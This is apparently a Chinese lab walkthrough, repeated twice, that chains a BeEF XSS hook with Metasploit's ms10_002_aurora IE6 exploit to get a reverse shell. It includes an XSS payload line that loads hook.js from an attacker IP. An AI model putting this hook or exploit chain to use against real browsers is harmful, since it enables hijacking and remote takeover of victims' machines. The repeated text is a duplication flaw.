本次beef结合msf 完成整个攻击过程
启动beef
beef
xss代码(beef生成):
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示:
xss执行
配置msf
payload
ms10_002_aurora (ie6 极光漏洞)
配置:
开始监听:
手动游览器执行:
(使用beef重定向到该url也可以)
上线:
反弹shell
本次beef结合msf 完成整个攻击过程
启动beef
beef
xss代码(beef生成):
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示:
xss执行
配置msf
payload
ms10_002_aurora (ie6 极光漏洞)
配置:
开始监听:
手动游览器执行:
(使用beef重定向到该url也可以)
上线:
反弹shell
很多往事